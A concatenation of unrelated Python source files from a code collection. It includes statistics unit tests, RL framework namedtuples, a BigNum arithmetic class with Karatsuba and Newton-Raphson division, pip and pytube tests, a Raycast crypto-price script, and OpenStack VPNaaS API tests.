import numpy as np
import pytest
from stats.inferential_stats.categorical import *
from stats.inferential_stats.pvalue import PValue
class TestChiSquare(object):
""" Uses table 12.1
"""
def setup(self):
FC_o = [42, 45, 51, 47, 60]
FC_e = [49, 49, 49, 49, 49]
return ChiSquare(FC_o, FC_e)
def test_chi_square(self):
ChiSquaretest = self.setup()
val = round(ChiSquaretest.test_stat, 2)
assert val == 3.96
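# Hand check of the statistic (chi-square = sum((O - E)^2 / E) for the
# observed/expected counts used in setup()):
#   (42-49)^2 + (45-49)^2 + (51-49)^2 + (47-49)^2 + (60-49)^2
#   = 49 + 16 + 4 + 4 + 121 = 194, and 194 / 49 ~= 3.96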
def test_pvalue(self):
ChiSquaretest = self.setup()
chi_square = round(ChiSquaretest.test_stat, 2)
p = PValue(test_stat=chi_square, n=5, chi_square=True)
pvalue = round(p.pvalue, 2)
assert pvalue == 0.41
class TestKolmogorovSmirnov(object):
NotImplemented
class TestContingency(object):
""" Uses table 12.6
"""
def setup(self):
FC_o = [[60, 70], [36, 33]]
return Contingency(FC_o)
def test_FC_e(self):
Contingencytest = self.setup()
val = round(Contingencytest.FC_e[0][0], 1)
assert val == 62.7
def test_chi_square(self):
Contingencytest = self.setup()
val = round(Contingencytest.test_stat, 2)
assert val == 0.65
|
py | b41053099f25cc6e1db23b75e6685cb6c3fd2f44 | # coding=utf-8
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common collections for all problems."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Tuple containing state of the environment.
# reward: a scalar float specifying the immediate reward for the step.
# done: a boolean indicating if this is the end of the current episode.
# observation: a numpy array or nested dict/list/tuple of numpy arrays
# containing information about current internal state.
# info: a numpy array or nested dict/list/tuple of numpy arrays containing
# any debug information.
EnvOutput = collections.namedtuple("EnvOutput",
["reward", "done", "observation", "info"])
# Tuple containing output of the agent.
# policy_logits: The logits of all possible actions.
# baseline: The value of given state.
AgentOutput = collections.namedtuple("AgentOutput",
["policy_logits", "baseline"])
# Tuple containing runtime configuration for distributed setup.
# task_id: A unique id assigned to each task
# num_tasks: Total tasks performing the same functionality.
RuntimeConfig = collections.namedtuple("RuntimeConfig",
["task_id", "num_tasks"])
# Tuple containing information about action taken by actor.
# chosen_action_idx: An int32 specifying the index of the chosen action at the
# current timestep.
# oracle_next_action_idx: An int32 specifying the index of the action at the
# next timestep that oracle would have chosen.
# action_val: An int32 specifying the pano id of the chosen action.
# log_prob: Float specifying the policy log-probability of the chosen action.
ActorAction = collections.namedtuple(
"ActorAction", ["chosen_action_idx", "oracle_next_action_idx", "action_val",
"log_prob"])
# Tuple containing output of the actor which is then read by learner.
# initial_agent_state: a tensor containing previous episode's final agent
# state. This may be used to initialize learner agent's initial state at
# the beginning of a batch. This tensor doesn't have time or batch dimension.
# env_output: A `EnvOutput` tuple for all the steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# agent_output: A `AgentOutput` tuple for all steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# actor_action: An `ActorAction` tuple for all steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# loss_type: A scalar int tensor denoting the type of loss to be used by
# learner on the enqueued episode.
# info: Any debug information to be passed on to the learner.
ActorOutput = collections.namedtuple("ActorOutput", [
"initial_agent_state", "env_output", "agent_output", "actor_action",
"loss_type", "info"
])
# Tuple containing information for aggregator summaries.
StepSummaries = collections.namedtuple("StepSummaries",
("step", "count", "metrics_sum"))
# Tuple containing agent and environment state, for use in planning.
# score: a scalar float for comparing the value of planning states.
# agent_output: A `AgentOutput` tuple.
# agent_state: A tensor containing the agent state. This tensor doesn't have
# time or batch dimension.
# env_output: A `EnvOutput` tuple.
# env_state: An object containing the environment state from get_state.
# action_history: A list with an `ActorAction` for each step in the episode.
PlanningState = collections.namedtuple("PlanningState", [
"score", "agent_output", "agent_state", "env_output", "env_state",
"action_history"])
# Different loss types supported in the framework.
# actor-critic loss
AC_LOSS = 0
# cross-entropy loss
CE_LOSS = 1
# Discriminative model Cross-Entropy loss
DCE_LOSS = 2
# Discriminative model focal loss
DCE_FOCAL_LOSS = 3
# Discriminator Batch Softmax loss
DISC_BATCH_LOSS = 4
STEP = "__reserved__step"
# Special field for visualization images.
VISUALIZATION_IMAGES = "visualization_images"
AUC = "auc"
|
py | b41055b63ace987879bcb741bab0340796e52167 | '''Large number arithmetic optimized for KS cores.'''
from __future__ import division # Use // for integer division.
import os # Used for os.environ.
import sys # Used to smooth over the range / xrange issue.
# Python 3 doesn't have xrange, and range behaves like xrange.
if sys.version_info >= (3,):
xrange = range
if os.environ.get('KS_DEBUG') and os.environ.get('KS_DEBUG') != 'false':
from ks_primitives import *
else:
from ks_primitives_unchecked import *
class BigNum(object):
'''Large number implemented as a little-endian array of Bytes.'''
def __init__(self, digits, size = None, no_copy = False):
'''Creates a BigNum from a sequence of digits.
Args:
digits: the Bytes used to populate the BigNum
size: if set, the BigNum will only use the first "size" elements of digits
no_copy: uses the "digits" argument as the backing store for BigNum, if
appropriate (meant for internal use inside BigNum)
'''
if size is None:
size = len(digits)
elif size < 0:
raise ValueError('BigNums cannot hold a negative amount of digits')
if size == 0:
size = 1
if no_copy and len(digits) == size:
self.d = digits
else:
self.d = digits[0:size]
while len(self.d) < size:
self.d.append(Byte.zero())
# Used by the Newton-Raphson division code.
self.__inverse = None
self.__inverse_precision = None
@staticmethod
def zero(size = 1):
'''BigNum representing the number 0 (zero).'''
return BigNum([Byte.zero()] * size, size, True)
@staticmethod
def one(size = 1):
'''BigNum representing the number 1 (one).'''
digits = [Byte.zero()] * size
digits[0] = Byte.one()
return BigNum(digits, size, True)
@staticmethod
def from_hex(hex_string):
'''BigNum representing the given hexadecimal number.
Args:
hex_string: string containing the desired number in hexadecimal; the
allowed digits are 0-9, A-F, a-f
'''
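# Example: BigNum.from_hex('0100') consumes the string two hex characters at a
# time from the right, giving the little-endian digits [0x00, 0x01], i.e. the
# value 0x0100 == 256.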
digits = []
for i in xrange(len(hex_string), 0, -2):
if i == 1:
byte_string = '0' + hex_string[0]
else:
byte_string = hex_string[(i - 2):i]
digits.append(Byte.from_hex(byte_string))
return BigNum(digits)
@staticmethod
def h(hex_string):
'''Shorthand for from_hex(hex_string).'''
return BigNum.from_hex(hex_string)
def hex(self):
'''Hexadecimal string representing this BigNum.
This method does not normalize the BigNum, because it is used during
debugging.
'''
start = len(self.d) - 1
while start > 0 and self.d[start] == Byte.zero():
start -= 1
return ''.join([self.d[i].hex() for i in xrange(start, -1, -1)])
def __eq__(self, other):
'''== for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return False
self.normalize()
other.normalize()
return self.d == other.d
def __ne__(self, other):
'''!= for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return True
self.normalize()
other.normalize()
return self.d != other.d
def __lt__(self, other):
'''< for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
self.normalize()
other.normalize()
if len(self.d) != len(other.d):
return len(self.d) < len(other.d)
for i in xrange(len(self.d) - 1, -1, -1):
if self.d[i] != other.d[i]:
return self.d[i] < other.d[i]
return False
def __le__(self, other):
'''<= for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
self.normalize()
other.normalize()
if len(self.d) != len(other.d):
return len(self.d) < len(other.d)
for i in xrange(len(self.d) - 1, -1, -1):
if self.d[i] != other.d[i]:
return self.d[i] < other.d[i]
return True
def __gt__(self, other):
'''> for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
return not self.__le__(other)
def __ge__(self, other):
'''>= for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
return not self.__lt__(other)
def __lshift__(self, digits):
'''This BigNum, with "digits" 0 digits appended at the end.
Shifting to the left multiplies the BigNum by 256^digits.
'''
new_digits = [Byte.zero()] * digits
new_digits.extend(self.d)
return BigNum(new_digits, None, True)
def __rshift__(self, digits):
'''This BigNum, without the last "digits" digits.
Shifting to the right divides the BigNum by 256^digits.
'''
if digits >= len(self.d):
return BigNum.zero()
return BigNum(self.d[digits:], None, True)
def __add__(self, other):
'''+ for BigNums.
Adding numbers does not normalize them. However, the result is normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be added to BigNums.
# One would think that it'd be faster to have a for loop for the digits
# between 0 and min(len(self.d), len(other.d)), and another loop between
# min(...) and max(...), so the ifs would be eliminated.
# Turns out pypy's JITter can eliminate the range checks on list accesses
# for the code below, so this method ends up being significantly faster than
# the one mentioned above, which intuitively seems better.
result = BigNum.zero(1 + max(len(self.d), len(other.d)))
carry = Byte.zero()
for i in xrange(0, len(result.d)):
if i < len(self.d):
a = self.d[i] + carry
else:
a = carry.word()
if i < len(other.d):
b = other.d[i].word()
else:
b = Word.zero()
word = a + b
result.d[i] = word.lsb()
carry = word.msb()
return result.normalize()
def __sub__(self, other):
'''- for BigNums.
Subtraction is done using 2s complement.
Subtracting numbers does not normalize them. However, the result is
normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be subtracted from BigNums.
result = BigNum.zero(max(len(self.d), len(other.d)))
carry = Byte.zero()
for i in xrange(0, len(result.d)):
if i < len(self.d):
a = self.d[i].word()
else:
a = Word.zero()
if i < len(other.d):
b = other.d[i] + carry
else:
b = carry.word()
word = a - b
result.d[i] = word.lsb()
if a < b:
carry = Byte.one()
else:
carry = Byte.zero()
return result.normalize()
def __mul__(self, other):
'''* for BigNums.
Multiplying numbers does not normalize them. However, the result is
normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be multiplied by BigNums.
if len(self.d) <= 64 or len(other.d) <= 64:
return self.slow_mul(other)
return self.fast_mul(other)
def slow_mul(self, other):
'''
Slow method for multiplying two numbers w/ good constant factors.
'''
return self.fast_mul(other)
def fast_mul(self, other):
'''
Asymptotically fast method for multiplying two numbers.
'''
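# A sketch of the identity the recursion below relies on (Karatsuba): writing
# x = x_hi*B^k + x_lo and y = y_hi*B^k + y_lo with B = 256 and k = split,
#   x*y = (x_hi*y_hi)*B^(2k)
#       + ((x_lo + x_hi)*(y_lo + y_hi) - x_hi*y_hi - x_lo*y_lo)*B^k
#       + x_lo*y_lo
# so only three recursive multiplications are needed instead of four.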
in_digits = max(len(self.d), len(other.d))
if in_digits == 1:
product = self.d[0] * other.d[0]
return BigNum([product.lsb(), product.msb()], 2, True)
split = in_digits // 2
self_low = BigNum(self.d[:split], None, True)
self_high = BigNum(self.d[split:], None, True)
other_low = BigNum(other.d[:split], None, True)
other_high = BigNum(other.d[split:], None, True)
result_high_high = self_high * other_high
result_low = self_low * other_low
result_high = (self_low + self_high) * (other_low + other_high) - \
(result_high_high + result_low)
return ((result_high_high << (2 * split)) + (result_high << split) +
result_low).normalize()
def __floordiv__(self, other):
'''/ for BigNums.
Dividing numbers normalizes them. The result is also normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
return self.__divmod__(other)[0]
def __mod__(self, other):
'''% for BigNums.
Dividing numbers normalizes them. The result is also normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
return self.__divmod__(other)[1]
def __divmod__(self, other):
'''divmod() for BigNums.
Dividing numbers normalizes them. The result is also normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
self.normalize()
other.normalize()
if len(self.d) <= 256 or len(other.d) <= 256:
return self.slow_divmod(other)
return self.fast_divmod(other)
def slow_divmod(self, other):
'''
Slow method for dividing two numbers w/ good constant factors.
'''
return self.fast_divmod(other)
def fast_divmod(self, other):
'''
Asymptotically fast method for dividing two numbers.
'''
# Special-case 1 so we don't have to deal with its inverse.
if len(other.d) == 1 and other.d[0] == Byte.one():
return (self, BigNum.zero())
if other.__inverse is None:
# First approximation: the inverse of the first digit in the divisor + 1,
# because 1 / 2xx is <= 1/200 and > 1/300.
base = Word.from_bytes(Byte.one(), Byte.zero())
msb_plus = (other.d[-1] + Byte.one()).lsb()
if msb_plus == Byte.zero():
msb_inverse = (base - Word.one()).lsb()
other.__inverse_precision = len(other.d) + 1
else:
msb_inverse = base // msb_plus
other.__inverse_precision = len(other.d)
other.__inverse = BigNum([msb_inverse], 1, True)
bn_one = BigNum.one()
while True:
# Division using other's multiplicative inverse.
quotient = (self * other.__inverse) >> other.__inverse_precision
product = other * quotient
if product > self:
product -= other
quotient -= bn_one
if product <= self:
remainder = self - product
if remainder >= other:
remainder -= other
quotient += bn_one
if remainder < other:
return (quotient, remainder)
# other needs a better multiplicative inverse approximation.
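# Newton-Raphson step for the scaled reciprocal: with X ~= B^p / other
# (B = 256, p = other.__inverse_precision), the update below computes
#   X' = 2*X*B^p - other*X*X
# which approximates B^(2p) / other, roughly doubling the precision per pass.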
old_inverse = other.__inverse
old_precision = other.__inverse_precision
other.__inverse = ((old_inverse + old_inverse) << old_precision) - \
(other * old_inverse * old_inverse)
other.__inverse.normalize()
other.__inverse_precision *= 2
# Trim zero digits at the end, they don't help.
zero_digits = 0
while other.__inverse.d[zero_digits] == Byte.zero():
zero_digits += 1
if zero_digits > 0:
other.__inverse = other.__inverse >> zero_digits
other.__inverse_precision -= zero_digits
def powmod(self, exponent, modulus):
'''Modular ^.
Args:
exponent: the exponent that this number will be raised to
modulus: the modulus
Returns (self ^ exponent) mod modulus.
'''
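# Square-and-multiply: the exponent is scanned bit by bit from the least
# significant byte up; `multiplier` holds self^(2^i) mod modulus and is squared
# once per bit, while `result` picks up the factors whose exponent bit is set.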
multiplier = BigNum(self.d)
result = BigNum.one()
exp = BigNum(exponent.d)
exp.normalize()
two = (Byte.one() + Byte.one()).lsb()
for i in xrange(len(exp.d)):
mask = Byte.one()
for j in xrange(0, 8):
if (exp.d[i] & mask) != Byte.zero():
result = (result * multiplier) % modulus
mask = (mask * two).lsb()
multiplier = (multiplier * multiplier) % modulus
return result
def __str__(self):
'''Debugging help: returns the BigNum formatted as "0x????...".'''
return '0x' + self.hex()
def __repr__(self):
'''Debugging help: returns an expression that can create this BigNum.'''
return 'BigNum.h("' + self.hex() + '", ' + str(len(self.d)) + ')'
def normalize(self):
'''Removes all the trailing 0 (zero) digits in this number.
Returns self, for easy call chaining.
'''
while len(self.d) > 1 and self.d[-1] == Byte.zero():
self.d.pop()
return self
def is_normalized(self):
'''False if the number has at least one trailing 0 (zero) digit.'''
return len(self.d) == 1 or self.d[-1] != Byte.zero()
|
py | b41055c5606420b1463ace99a06e07cabc781376 | import fnmatch
import json
from os.path import basename
from pip._vendor.packaging.utils import canonicalize_name
from pytest import mark
def pip(script, command, requirement):
return script.pip(
command, '--prefer-binary', '--no-cache-dir',
'--use-feature=fast-deps', requirement,
allow_stderr_warning=True,
)
def assert_installed(script, names):
list_output = json.loads(script.pip('list', '--format=json').stdout)
installed = {canonicalize_name(item['name']) for item in list_output}
assert installed.issuperset(map(canonicalize_name, names))
@mark.network
@mark.parametrize(('requirement', 'expected'), (
('Paste==3.4.2', ('Paste', 'six')),
('Paste[flup]==3.4.2', ('Paste', 'six', 'flup')),
))
def test_install_from_pypi(requirement, expected, script):
pip(script, 'install', requirement)
assert_installed(script, expected)
@mark.network
@mark.parametrize(('requirement', 'expected'), (
('Paste==3.4.2', ('Paste-3.4.2-*.whl', 'six-*.whl')),
('Paste[flup]==3.4.2', ('Paste-3.4.2-*.whl', 'six-*.whl', 'flup-*')),
))
def test_download_from_pypi(requirement, expected, script):
result = pip(script, 'download', requirement)
created = list(map(basename, result.files_created))
assert all(fnmatch.filter(created, f) for f in expected)
@mark.network
def test_build_wheel_with_deps(data, script):
result = pip(script, 'wheel', data.packages/'requiresPaste')
created = list(map(basename, result.files_created))
assert fnmatch.filter(created, 'requiresPaste-3.1.4-*.whl')
assert fnmatch.filter(created, 'Paste-3.4.2-*.whl')
assert fnmatch.filter(created, 'six-*.whl')
|
py | b4105633ad4ce5e18d2f1a1bb816ee4120eb97da | from abc import ABC, abstractmethod
class Food(ABC):
@abstractmethod
def __init__(self, quantity: int):
self.quantity = quantity
class Vegetable(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Fruit(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Meat(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Seed(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
|
py | b410575ebfb6e9f6839c1a17cab8551d69f9e911 | from pyopteryx.utils.builder_utils import add_predecessor_precedence, add_successor_precedence
from pyopteryx.utils.xml_utils import get_by_id, get_action_type, check_and_retrieve_uid, \
create_activity_name_from_action
class AbstractActionFactory:
def __init__(self, action, task_activities, xml_cache, processor, mapping_cache):
self.action = action
self.processor = processor
self.task = processor.find("task")
self.entry_name = processor.find(".//entry").get("name")
self.task_activities = task_activities
self.task = processor.find("task")
self.reply_entry = task_activities.find("./reply-entry")
self.mapping_cache = mapping_cache
self.uid_string = check_and_retrieve_uid(mapping_cache=mapping_cache, processor=processor)
self.activity_name = create_activity_name_from_action(action=action, uid_string=self.uid_string)
self.xml_cache = xml_cache
def add_action(self):
"""
Add action to processor.
"""
pass
def _add_precedences(self, action, task_activities, activity_name):
"""
Add precedences for action depending on the type of action: normal and usage.
:param action: current action
:param task_activities: task_activities to add precedence to
:param activity_name: parsed action name for precedence activity
"""
# If action is usage action get predecessor from parameter "predecessor" and "successor"
predecessor_abstract_action_id = action.get("predecessor_AbstractAction")
successor_abstract_action_id = action.get("successor_AbstractAction")
predecessor_action = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=predecessor_abstract_action_id)
successor_action = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=successor_abstract_action_id)
# If action has predecessor add precedence
if predecessor_action is not None:
action_type = get_action_type(predecessor_action)
if action_type == 'SetVariableAction': # should already have been created, pass
pass
else:
add_predecessor_precedence(task_activities=task_activities,
predecessor_action=predecessor_action,
post_activity_name=activity_name,
mapping_cache=self.mapping_cache)
# If action has successor add precedence
if successor_action is not None:
action_type = get_action_type(successor_action)
# skip SetVariableAction and take successor of SetVariableAction as successor of current action
# SetVariableAction not supported by Peropteryx + LQNS, see documentation
if action_type == 'SetVariableAction':
second_level_successor_id = successor_action.get('successor_AbstractAction')
second_level_successor = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=second_level_successor_id)
add_successor_precedence(task_activities=task_activities,
successor_action=second_level_successor,
pre_activity_name=activity_name,
mapping_cache=self.mapping_cache)
else:
add_successor_precedence(task_activities=task_activities,
successor_action=successor_action,
pre_activity_name=activity_name,
mapping_cache=self.mapping_cache)
|
py | b410579572a056744c5b4275e8b2db553b7f51ed | # -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 Dmitriy Yefremov
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Author: Dmitriy Yefremov
#
from app.commons import run_task
from app.settings import SettingsType
from .ecommons import Service, Satellite, Transponder, Bouquet, Bouquets, is_transponder_valid
from .enigma.blacklist import get_blacklist, write_blacklist
from .enigma.bouquets import to_bouquet_id, BouquetsWriter, BouquetsReader
from .enigma.lamedb import get_services as get_enigma_services, write_services as write_enigma_services
from .iptv import parse_m3u
from .neutrino.bouquets import get_bouquets as get_neutrino_bouquets, write_bouquets as write_neutrino_bouquets
from .neutrino.services import get_services as get_neutrino_services, write_services as write_neutrino_services
from .satxml import get_satellites, write_satellites
def get_services(data_path, s_type, format_version):
if s_type is SettingsType.ENIGMA_2:
return get_enigma_services(data_path, format_version)
elif s_type is SettingsType.NEUTRINO_MP:
return get_neutrino_services(data_path)
@run_task
def write_services(path, channels, s_type, format_version):
if s_type is SettingsType.ENIGMA_2:
write_enigma_services(path, channels, format_version)
elif s_type is SettingsType.NEUTRINO_MP:
write_neutrino_services(path, channels)
def get_bouquets(path, s_type):
if s_type is SettingsType.ENIGMA_2:
return BouquetsReader(path).get()
elif s_type is SettingsType.NEUTRINO_MP:
return get_neutrino_bouquets(path)
def write_bouquet(path, bq, s_type):
if s_type is SettingsType.ENIGMA_2:
writer = BouquetsWriter(path, None)
writer.write_bouquet(f"{path}userbouquet.{bq.name}.{bq.type}", bq.name, bq.services)
elif s_type is SettingsType.NEUTRINO_MP:
from .neutrino.bouquets import write_bouquet
write_bouquet(path, bq)
@run_task
def write_bouquets(path, bouquets, s_type, force_bq_names=False):
if s_type is SettingsType.ENIGMA_2:
BouquetsWriter(path, bouquets, force_bq_names).write()
elif s_type is SettingsType.NEUTRINO_MP:
write_neutrino_bouquets(path, bouquets)
if __name__ == "__main__":
pass
|
py | b41057e341d679f47d6cecd295be2aa802915e3e | #!/usr/bin/env python3
# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title Crypto
# @raycast.mode inline
# @raycast.refreshTime 5m
# @raycast.packageName Money
# Optional parameters:
# @raycast.icon 💰
# Documentation:
# @raycast.description Gets crypto prices from Binance
# @raycast.author Manan Mehta
# @raycast.authorURL https://github.com/mehtamanan
import json
from urllib.request import urlopen
import sys
# Other symbols
# ETHUSDT - Ethereum / USD
# LTCUSDT - Litcoin / USD
# LTCBTC - Litecoin / Bitcoin
# ADAUSDT - Cardano / USD
# BNBUSDT - Binance Coin / USD
# DOTUSDT - Polkadot / USD
# XRPUSDT - Ripple / USD
SYMBOLS = ['BTCUSDT', 'ETHBTC']
# Fetch tickers from Binance for selected symbols
responses = []
for symbol in SYMBOLS:
try:
with urlopen('https://api.binance.com/api/v3/ticker/24hr?symbol={}'.format(symbol)) as f:
responses.append(json.load(f))
    except Exception:
        print('Failed loading prices...')
sys.exit(0)
# Create and print inline message
messages = []
for r in responses:
messages.append('{}: {:.3f} ({:+.2f}%)'.format(r['symbol'], float(r['askPrice']), float(r['priceChangePercent'])))
print(' '.join(messages))
|
py | b410583edd999cab45eb71065425c24cb52e46bb | # -*- coding: utf-8 -*-
"""Unit tests for the :module:`extract <extract>` module."""
from datetime import datetime
import pytest
from pytube import extract
from pytube.exceptions import RegexMatchError
def test_extract_video_id():
url = "https://www.youtube.com/watch?v=2lAe1cqCOXo"
video_id = extract.video_id(url)
assert video_id == "2lAe1cqCOXo"
def test_info_url_age_restricted(age_restricted):
video_info_url = extract.video_info_url_age_restricted(
video_id="QRS8MkLhQmM", embed_html=age_restricted["embed_html"],
)
expected = (
"https://youtube.com/get_video_info?video_id=QRS8MkLhQmM&eurl"
"=https%3A%2F%2Fyoutube.googleapis.com%2Fv%2FQRS8MkLhQmM&sts="
)
assert video_info_url == expected
def test_info_url(cipher_signature):
video_info_url = extract.video_info_url(
video_id=cipher_signature.video_id,
watch_url=cipher_signature.watch_url,
)
expected = (
"https://youtube.com/get_video_info?video_id=2lAe1cqCOXo"
"&ps=default&eurl=https%253A%2F%2Fyoutube.com%2Fwatch%253Fv%"
"253D2lAe1cqCOXo&hl=en_US"
)
assert video_info_url == expected
def test_js_url(cipher_signature):
expected = (
"https://youtube.com/s/player/9b65e980/player_ias.vflset/en_US/base.js"
)
result = extract.js_url(cipher_signature.watch_html)
assert expected == result
def test_age_restricted(age_restricted):
assert extract.is_age_restricted(age_restricted["watch_html"])
def test_non_age_restricted(cipher_signature):
assert not extract.is_age_restricted(cipher_signature.watch_html)
def test_is_private(private):
assert extract.is_private(private['watch_html'])
def test_not_is_private(cipher_signature):
assert not extract.is_private(cipher_signature.watch_html)
def test_recording_available(cipher_signature):
assert extract.recording_available(cipher_signature.watch_html)
def test_publish_date(cipher_signature):
expected = datetime(2019, 12, 5)
assert cipher_signature.publish_date == expected
assert extract.publish_date('') is None
def test_not_recording_available(missing_recording):
assert not extract.recording_available(missing_recording['watch_html'])
def test_mime_type_codec():
mime_type, mime_subtype = extract.mime_type_codec(
'audio/webm; codecs="opus"'
)
assert mime_type == "audio/webm"
assert mime_subtype == ["opus"]
def test_mime_type_codec_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.mime_type_codec("audio/webm")
def test_get_ytplayer_config_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.get_ytplayer_config("")
def test_get_ytplayer_js_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.get_ytplayer_js("")
def test_signature_cipher_does_not_error(stream_dict):
config_args = extract.get_ytplayer_config(stream_dict)['args']
extract.apply_descrambler(config_args, "url_encoded_fmt_stream_map")
assert "s" in config_args["url_encoded_fmt_stream_map"][0].keys()
def test_initial_data_missing():
with pytest.raises(RegexMatchError):
extract.initial_data('')
def test_initial_data(stream_dict):
initial_data = extract.initial_data(stream_dict)
assert 'contents' in initial_data
|
py | b41059cb54fe81a16b45a5e1406a4f7c20e03d47 | # Copyright 2013, Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Tatiana Mazur
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from neutronclient.v2_0 import client
neutronclient = client.Client
class VPNaasApiTests(test.APITestCase):
@test.create_stubs({neutronclient: ('create_vpnservice',)})
def test_vpnservice_create(self):
vpnservice1 = self.api_vpnservices.first()
form_data = {
'name': vpnservice1['name'],
'description': vpnservice1['description'],
'subnet_id': vpnservice1['subnet_id'],
'router_id': vpnservice1['router_id'],
'admin_state_up': vpnservice1['admin_state_up']
}
vpnservice = {'vpnservice': self.api_vpnservices.first()}
neutronclient.create_vpnservice(
{'vpnservice': form_data}).AndReturn(vpnservice)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_create(self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.VPNService)
@test.create_stubs({neutronclient: ('list_vpnservices',
'list_ipsec_site_connections'),
api.neutron: ('subnet_list', 'router_list')})
def test_vpnservice_list(self):
vpnservices = {'vpnservices': self.vpnservices.list()}
vpnservices_dict = {'vpnservices': self.api_vpnservices.list()}
subnets = self.subnets.list()
routers = self.routers.list()
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_vpnservices().AndReturn(vpnservices_dict)
api.neutron.subnet_list(self.request).AndReturn(subnets)
api.neutron.router_list(self.request).AndReturn(routers)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_list(self.request)
for (v, d) in zip(ret_val, vpnservices['vpnservices']):
self.assertIsInstance(v, api.vpn.VPNService)
            self.assertEqual(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_vpnservice',
'list_ipsec_site_connections'),
api.neutron: ('subnet_get', 'router_get')})
def test_vpnservice_get(self):
vpnservice = self.vpnservices.first()
vpnservice_dict = {'vpnservice': self.api_vpnservices.first()}
subnet = self.subnets.first()
router = self.routers.first()
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_vpnservice(
vpnservice.id).AndReturn(vpnservice_dict)
api.neutron.subnet_get(self.request, subnet.id).AndReturn(subnet)
api.neutron.router_get(self.request, router.id).AndReturn(router)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_get(self.request, vpnservice.id)
self.assertIsInstance(ret_val, api.vpn.VPNService)
@test.create_stubs({neutronclient: ('create_ikepolicy',)})
def test_ikepolicy_create(self):
ikepolicy1 = self.api_ikepolicies.first()
form_data = {
'name': ikepolicy1['name'],
'description': ikepolicy1['description'],
'auth_algorithm': ikepolicy1['auth_algorithm'],
'encryption_algorithm': ikepolicy1['encryption_algorithm'],
'ike_version': ikepolicy1['ike_version'],
'lifetime': ikepolicy1['lifetime'],
'phase1_negotiation_mode': ikepolicy1['phase1_negotiation_mode'],
'pfs': ikepolicy1['pfs']
}
ikepolicy = {'ikepolicy': self.api_ikepolicies.first()}
neutronclient.create_ikepolicy(
{'ikepolicy': form_data}).AndReturn(ikepolicy)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_create(self.request, **form_data)
